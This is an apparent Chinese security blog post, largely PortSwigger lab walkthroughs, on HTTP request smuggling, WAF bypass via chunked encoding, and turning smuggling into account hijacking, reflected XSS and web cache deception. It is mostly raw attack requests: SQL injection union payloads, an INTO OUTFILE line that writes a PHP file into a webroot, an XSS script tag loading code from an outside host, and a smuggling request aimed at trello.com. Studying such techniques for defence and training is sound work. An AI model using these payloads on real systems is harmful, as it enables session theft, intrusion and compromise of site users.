http-requests-smuggling账户劫持与waf绕过 – 作者:guocoolguo

参考链接（有可能需要翻墙）：
https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d

Transfer-Encoding:chunked

POST/HTTP/1.1
Host:ningfeng.com
Content-Type:application/x-www-form-urlencoded
Transfer-Encoding:chunked

b(十进制是11 16进制是b)
q=smuggling
6
hahaha
0
空
空

Transfer-Encoding的妙用
绕过waf使用分块
id=1 id=1 union select 1,2,table_name,4 from information_schema.tables where table_schema=’yzm’
id=1 id=1 union select 1,2,username,password from user
id=1 union select 1,2,column_name,4 from information_schema.columunion select 1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4
ns where table_schma=’yzm’ and table_name=’user’
id=1 union select 1,2,username,password from user union select 1,2,3,'<?php phpinfo()?>’ into outfile “C:/phpStudy/PHPTutorial/WWW/shell1.php”%23

CL-TE走私
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
——–
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding:chunked

0

A

TE-CL走私
https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
——-
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

TE-TE走私
https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
——
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-encoding: chunked
Transfer-encoding: cow

8
SMUGGLED
0

一、实战利用走私造成账户劫持
https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests

POST / HTTP/1.1
Host: acea1f901e2e1cad80e665da0052003e.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests
Connection: close
Cookie: session=8OpNIpcPROeJCh4NTKrKdswvL3UVLcZ7
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 466
Transfer-encoding: chunked

0

POST /post/comment HTTP/1.1
Host: acea1f901e2e1cad80e665da0052003e.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 800
Connection: close
Cookie: session=8OpNIpcPROeJCh4NTKrKdswvL3UVLcZ7

csrf=JysTwJjScrQNCUPsyWbZMwwMKlpltaCU&postId=3&name=guocool&email=4513641%40qq.com&website=https%3A%2F%2Fwww.baidu.com&comment=aaa

二、实战利用走私使反射xss“升级”
https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss

POST / HTTP/1.1
Host: ac321f5c1edb914d80ec24bd00760018.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: session=U4uy6HF2ysWgo9x3puFV5tWfJghUCzY9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 457
Transfer-encoding: chunked

0

GET /post?postId=4 HTTP/1.1
Host: ac321f5c1edb914d80ec24bd00760018.web-security-academy.net
User-Agent: “><script/src=//15.rs></script>#
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://ac321f5c1edb914d80ec24bd00760018.web-security-academy.net/
Connection: close
Cookie: session=U4uy6HF2ysWgo9x3puFV5tWfJghUCzY9
注意事项：
先抓主页，再将走私的请求放到主页面请求，最后抓主页页面看是否又xss，有的话再次访问主页就会发现出现反射型xss

补充知识点：
三、实战利用走私造成web缓存欺骗———-The credentials are: carlos / montoya
https://portswigger.net/web-security/request-smuggling/exploiting/lab-perform-web-cache-deception

POST / HTTP/1.1
Host: ac3e1f611ffb77d4803f429c00a200c3.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-perform-web-cache-deception
Connection: close
Cookie: session=bPdxgrOnPdSMS5P7CzEX5SpaN3jA46Pl
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Transfer-encoding: chunked

0

GET /my-account HTTP/1.1
Foo: X
注意：疯狂请求图片地址，一次没有多次就可以得到API key

重头戏：
Trello的请求走私挖掘
POST /1/cards HTTP/1.1
Host:trello.com
Transfer-Encoding: [tab] chunked
Content-Length:4

9f[159]

PUT /1/members/1234 HTTP/1.1
Host: trello.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 400

x=x&csrf=1234&username=testzzz&bio=cake
0 

GET /HTTP/1.1
Host:trello.com

彩蛋(需要翻墙查看)：https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d

共同进步wc：rx6662

来源：freebuf.com 2020-08-03 15:16:40 by: guocoolguo